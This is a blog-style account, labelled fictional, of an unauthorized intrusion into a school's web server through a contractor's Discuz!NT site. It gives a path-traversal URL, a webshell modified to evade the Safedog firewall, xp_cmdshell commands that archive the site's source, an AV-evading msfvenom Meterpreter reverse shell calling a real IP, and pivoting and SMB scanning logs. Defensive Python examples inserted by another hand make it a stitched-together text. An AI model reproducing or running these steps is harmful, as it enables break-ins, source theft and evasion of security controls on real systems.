Summary: a simple penetration test of a certain website
This article is entirely fictional and for entertainment only; the content is beginner-level, experts feel free to skip.
The sun was shining today, so I did another security test for my old school.
I had tested it before: the main site runs PowerEasy CMS 2006 (动易CMS2006), and there are no publicly known vulnerabilities for it.
The web server is IIS 7.5, and a misconfiguration leaves directory browsing enabled, which on its own was of little use.
The information at the bottom of the homepage shows that the site was built by an outside company:
So I ran a security test against that company (XXXX Network) and obtained one of its sub-sites, www.****.com.cn:82, together with the super-administrator password **wl****1917.
The forum software is Discuz!NT 3.1.0, whose admin panel can be used to get a shell:
Visit http://www.****.com.cn:82/admin/global/global_templatesedit.aspx?path=..%2ftools%2f&filename=rss.aspx&templateid=1&templatename=Default
and the template editor opens the corresponding rss.aspx file (the path parameter walks out of the template directory with ..%2f); change its contents to:
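The bug in the request above is that `path` and `filename` come straight from the query string and are joined under the template root without any containment check, so "..%2ftools%2f" escapes the directory. The following is an added example, not code from the original post or from Discuz!NT, showing that vulnerable pattern next to a hardened resolver; the function names, the temporary template root and the .htm/.html allowlist are assumptions for illustration.

```python
# Added example, not code from the original post or from Discuz!NT. Shows the
# vulnerable path handling behind the template-editor request (path and
# filename trusted and joined under the template root) next to a hardened
# version. Function names, the temporary root and ALLOWED_EXT are assumptions.
import os
import tempfile
from urllib.parse import unquote


class TemplateError(Exception):
    """Raised by the hardened resolver when a request is rejected."""


def vulnerable_resolve(root: str, path: str, filename: str) -> str:
    # Vulnerable pattern: decode both parameters and join them under root with
    # no containment check, so "../" inside `path` leaves the template directory.
    return os.path.normpath(os.path.join(root, unquote(path), unquote(filename)))


ALLOWED_EXT = {".htm", ".html"}  # assumption: templates are HTML fragments only


def hardened_resolve(root: str, path: str, filename: str) -> str:
    root_real = os.path.realpath(root)
    path = unquote(path)
    filename = unquote(filename)
    # The filename must be a single path component.
    if not filename or filename in (".", "..") or "/" in filename or os.sep in filename:
        raise TemplateError("bad filename")
    # Resolve symlinks and ".." first; a raw string-prefix check is not enough.
    candidate = os.path.realpath(os.path.join(root_real, path, filename))
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise TemplateError("path escapes template root")
    # A template editor has no business writing server-side script files.
    if os.path.splitext(filename)[1].lower() not in ALLOWED_EXT:
        raise TemplateError("extension not allowed")
    return candidate


def demo() -> dict:
    """Run both resolvers against a benign edit and the traversal from the post."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "templates")
    os.makedirs(os.path.join(root, "Default"))
    os.makedirs(os.path.join(base, "tools"))
    out = {}
    attack = vulnerable_resolve(root, "..%2ftools%2f", "rss.aspx")
    out["vuln_attack_in_tools"] = attack.endswith(os.path.join("tools", "rss.aspx"))
    out["vuln_attack_escapes"] = (
        os.path.commonpath([os.path.realpath(root), os.path.realpath(attack)])
        != os.path.realpath(root)
    )
    out["hard_benign_ok"] = hardened_resolve(root, "Default%2f", "index.htm").endswith(
        os.path.join("templates", "Default", "index.htm")
    )
    for key, p, f in (("hard_traversal", "..%2ftools%2f", "rss.aspx"),
                      ("hard_bad_ext", "Default%2f", "rss.aspx")):
        try:
            hardened_resolve(root, p, f)
            out[key] = "accepted"
        except TemplateError as exc:
            out[key] = str(exc)
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The hardened version checks containment on the resolved real path rather than on the decoded string, and it rejects the .aspx extension independently, so either a traversal or a script file is refused even if the other check were removed.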
When I then visited it, the request was blocked by Safedog (安全狗)...
It looked like an old version of Safedog that the administrator had never updated.
So I changed the one-liner webshell a little:
<%
' The request value is copied into a variable and echoed before it reaches
' eval, so the literal "eval request(...)" form the WAF was matching is gone.
dim luan
luan=request("luan")
response.write("Hello " & luan)
eval luan
%>
and it got past Safedog...
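Why the modified shell got through: a WAF rule keyed on the literal text `eval request(...)` stops matching as soon as the value takes a detour through a variable. The following is an added example, not from the original post; the Safedog rule that was bypassed is not public, so the "literal rule" here is an assumption standing in for that class of signature, and the three sample sources are constructed (the "variant" is the post's modified one-liner). The second check follows the request value through assignments to the eval/execute sink and flags both forms while leaving the benign echo alone.

```python
# Added example, not from the original post. A literal-signature rule next to a
# small per-statement taint check for classic-ASP (VBScript) source. The
# "literal rule" is an assumption standing in for the WAF signature the post
# bypassed; the three SAMPLES are constructed here.
import re

SAMPLES = {
    "canonical": '<%eval request("luan")%>',
    "variant": '''<%
dim luan
luan=request("luan")
response.write("Hello " & luan)
eval luan
%>''',
    "benign": '''<%
dim name
name=request("name")
response.write("Hello " & name)
%>''',
}

# Signature-style rule: eval applied directly to request(...) / request.form(...).
LITERAL_RULE = re.compile(r'\beval\s*\(?\s*request\s*[.(]', re.I)

ASSIGN = re.compile(r'^\s*(?:set\s+)?([a-z_]\w*)\s*=\s*(.+?)\s*$', re.I)
SINK = re.compile(r'^\s*(?:eval|execute|executeglobal)\b\s*\(?\s*(.+?)\s*\)?\s*$', re.I)
SOURCE = re.compile(r'\brequest\b', re.I)


def literal_match(src: str) -> bool:
    return bool(LITERAL_RULE.search(src))


def statements(src: str):
    """Yield VBScript statements: strip <% %>, split lines, then split on ':'
    outside string literals and drop ' comments."""
    src = src.strip()
    if src.startswith("<%"):
        src = src[2:]
    if src.endswith("%>"):
        src = src[:-2]
    for line in src.splitlines():
        cur, in_str = [], False
        for ch in line:
            if ch == '"':
                in_str = not in_str
            if ch == "'" and not in_str:
                break                      # comment runs to end of line
            if ch == ":" and not in_str:
                yield "".join(cur)
                cur = []
            else:
                cur.append(ch)
        yield "".join(cur)


def _mentions(expr: str, names: set) -> bool:
    return any(re.search(r'\b%s\b' % re.escape(n), expr, re.I) for n in names)


def tainted_sink(src: str) -> bool:
    """True if request data reaches eval/execute, directly or via variables."""
    tainted = set()
    for stmt in statements(src):
        stmt = stmt.strip()
        if not stmt:
            continue
        m = SINK.match(stmt)
        if m:
            if SOURCE.search(m.group(1)) or _mentions(m.group(1), tainted):
                return True
            continue
        m = ASSIGN.match(stmt)
        if m:
            name, rhs = m.group(1).lower(), m.group(2)
            if SOURCE.search(rhs) or _mentions(rhs, tainted):
                tainted.add(name)
            else:
                tainted.discard(name)   # overwritten with clean data
    return False


def demo() -> dict:
    """(literal_match, tainted_sink) for each sample."""
    return {name: (literal_match(s), tainted_sink(s)) for name, s in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(f"{name}: literal={verdict[0]} taint={verdict[1]}")
```

The taint check is deliberately simple (one pass, no branches or string concatenation tracking), but it already shows the difference: a rule that asks "does request data reach eval?" is not defeated by renaming, padding with response.write, or splitting the shell across statements with ":".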
Connecting with China Chopper (菜刀) 2010 returned a 403:
The HTTP headers Chopper displayed showed the request was being blocked by Safedog.
Switching to the 2016 version of Chopper (download: http://lu4n.com/security-tools/ ) connected normally:
Next I tried executing a command:
and got: [Err] ActiveX component can't create object
That means the scripting component used for command execution has been disabled, so I had to take a more roundabout route.
The Discuz!NT 3.1.0 admin panel can execute SQL statements directly, so if the method above does not give you a shell, executing SQL is another way to get one.
I could not be bothered to dig out the database password and connect directly, so I went straight to the SQL execution page in the admin panel.
Packing the main site's source with a command:
exec xp_cmdshell 'C:\progra~2\WinRAR\Rar.exe a -k -r -s -m1 D:/****web/yzblog/tools/luan.rar D:/****web/PowerEasy2006/';
Command execution earlier had confirmed we were running as SYSTEM. If xp_cmdshell fails, search for "restore xp_cmdshell": it is disabled by default on SQL Server and has to be re-enabled through sp_configure.
For reference, the equivalent for packing a website on Linux is:
tar -czf website.tar.gz /home/wwwroot
The packed source came to 500 MB, too large; I did not download it, since this was only a security test, and deleted the archive right after packing.
Then I got curious whether the school intranet had any servers that could be hit directly with an SMB overflow, so I uploaded an AV-evading Meterpreter; the evasion method is at http://lu4n.com/metasploit-payload-bypass-av-note/
It takes up some space, but here it is:
> msfvenom -p windows/meterpreter/reverse_tcp LPORT=6666 LHOST=103.27.187.212 -e x86/shikata_ga_nai -i 11 -f py -o C:/luan/luan.py
DL is deprecated, please use Fiddle
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 11 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai succeeded with size 387 (iteration=1)
x86/shikata_ga_nai succeeded with size 414 (iteration=2)
x86/shikata_ga_nai succeeded with size 441 (iteration=3)
x86/shikata_ga_nai succeeded with size 468 (iteration=4)
x86/shikata_ga_nai succeeded with size 495 (iteration=5)
x86/shikata_ga_nai succeeded with size 522 (iteration=6)
x86/shikata_ga_nai succeeded with size 549 (iteration=7)
x86/shikata_ga_nai succeeded with size 576 (iteration=8)
x86/shikata_ga_nai succeeded with size 603 (iteration=9)
x86/shikata_ga_nai succeeded with size 630 (iteration=10)
x86/shikata_ga_nai chosen with final size 630
Payload size: 630 bytes
Saved as: C:/luan/luan.py

C:\PentestBox\bin\metasploit-framework
>
Remember to apply the modifications from that article; I will not paste them here, they take too much space. After modifying, pack it with PyInstaller:
C:\cnzxsoft\pyinstaller-2.0>python PyInstaller.py --console --onefile luan.py
548 INFO: wrote C:\cnzxsoft\pyinstaller-2.0\luan\luan.spec
641 INFO: Testing for ability to set icons, version resources...
743 INFO: ... resource update available
746 INFO: UPX is not available.
2071 INFO: checking Analysis
2072 INFO: building Analysis because out00-Analysis.toc non existent
2072 INFO: running Analysis out00-Analysis.toc
2072 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
15654 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_none ...
15655 INFO: Found manifest C:\Windows\WinSxS\Manifests\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91.manifest
15668 INFO: Searching for file msvcr90.dll
15670 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcr90.dll
15673 INFO: Searching for file msvcp90.dll
15674 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcp90.dll
15675 INFO: Searching for file msvcm90.dll
15677 INFO: Found file C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.21022.8_none_bcb86ed6ac711f91\msvcm90.dll
15960 INFO: Analyzing C:\cnzxsoft\pyinstaller-2.0\support\_pyi_bootstrap.py
16641 INFO: Analyzing C:\cnzxsoft\pyinstaller-2.0\PyInstaller\loader\archive.py
16733 INFO: Analyzing C:\cnzxsoft\pyinstaller-2.0\PyInstaller\loader\carchive.py
16822 INFO: Analyzing C:\cnzxsoft\pyinstaller-2.0\PyInstaller\loader\iu.py
16861 INFO: Analyzing luan.py
16931 INFO: Hidden import 'encodings' has been found otherwise
16933 INFO: Looking for run-time hooks
16934 INFO: Analyzing rthook C:\cnzxsoft\pyinstaller-2.0\support/rthooks/pyi_rth_encodings.py
17144 INFO: Warnings written to C:\cnzxsoft\pyinstaller-2.0\luan\build\pyi.win32\luan\warnluan.txt
17150 INFO: checking PYZ
17151 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
17152 INFO: building PYZ out00-PYZ.toc
19378 INFO: checking PKG
19379 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
19381 INFO: building PKG out00-PKG.pkg
20487 INFO: checking EXE
20492 INFO: rebuilding out00-EXE.toc because luan.exe missing
20493 INFO: building EXE from out00-EXE.toc
20510 INFO: Appending archive to EXE C:\cnzxsoft\pyinstaller-2.0\luan\dist\luan.exe

C:\cnzxsoft\pyinstaller-2.0>
Upload it with Chopper and run it through the SQL execution page:
Then scan with MSF.
meterpreter > run post/windows/manage/migrate
[*] Running module against WIN-TOYQDX47WMW
[*] Current server process: luan.exe (5996)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 4316
[+] Successfully migrated to process 4316
meterpreter > sysinfo
Computer        : WIN-TOYQDX47WMW
OS              : Windows 2008 (Build 6002, Service Pack 2).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
IIS APPPOOL\jwweb
NT AUTHORITY\IUSR
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/windows/manage/autoroute.
[!] Example: run post/windows/manage/autoroute OPTION=value [...]
Local subnet: 172.16.11.0/255.255.255.0
meterpreter > run post/windows/manage/autoroute
[*] Running module against WIN-TOYQDX47WMW
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.16.11.0/255.255.255.0 from host's routing table.
[+] Route added to subnet 169.254.0.0/255.255.0.0 from Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #4.
meterpreter > background
[*] Backgrounding session 2...
msf exploit(handler) > route print

IPv4 Active Routing Table
=========================

   Subnet             Netmask            Gateway
   ------             -------            -------
   169.254.0.0        255.255.0.0        Session 2
   172.16.11.0        255.255.255.0      Session 2

[*] There are currently no IPv6 routes defined.
msf exploit(handler) > use auxiliary/scanner/smb/
use auxiliary/scanner/smb/pipe_auditor
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_ms17_010
use auxiliary/scanner/smb/pipe_dcerpc_auditor
use auxiliary/scanner/smb/smb_enumusers
use auxiliary/scanner/smb/smb_uninit_cred
use auxiliary/scanner/smb/psexec_loggedin_users
use auxiliary/scanner/smb/smb_enumusers_domain
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/smb/smb2
use auxiliary/scanner/smb/smb_login
use auxiliary/scanner/smb/smb_enum_gpp
use auxiliary/scanner/smb/smb_lookupsid
msf exploit(handler) > use auxiliary/scanner/smb/smb_version
msf auxiliary(smb_version) > set rhosts 172.16.11.1-255
rhosts => 172.16.11.1-255
msf auxiliary(smb_version) > set threads 10
threads => 10
msf auxiliary(smb_version) > run
[*] 172.16.11.11:445 - Host is running Windows 2008 Standard SP2 (build:6002) (name:WIN-TOYQDX47WMW) (workgroup:WORKGROUP )
[*] 172.16.11.12:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:WIN-HKFJ6JJA9L5)
[*] Scanned 29 of 255 hosts (11% complete)
[*] Scanned 52 of 255 hosts (20% complete)
[*] Scanned 77 of 255 hosts (30% complete)
[*] Scanned 102 of 255 hosts (40% complete)
[*] Scanned 131 of 255 hosts (51% complete)
[*] Scanned 153 of 255 hosts (60% complete)
[*] Scanned 179 of 255 hosts (70% complete)
[*] Scanned 204 of 255 hosts (80% complete)
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf auxiliary(smb_version) >
Looks like there are only two machines... and the other one is Windows 2012 R2; as far as I have tested, that SMB overflow only works on XP, 7 and 2008. My goal had already been reached, so I stopped here.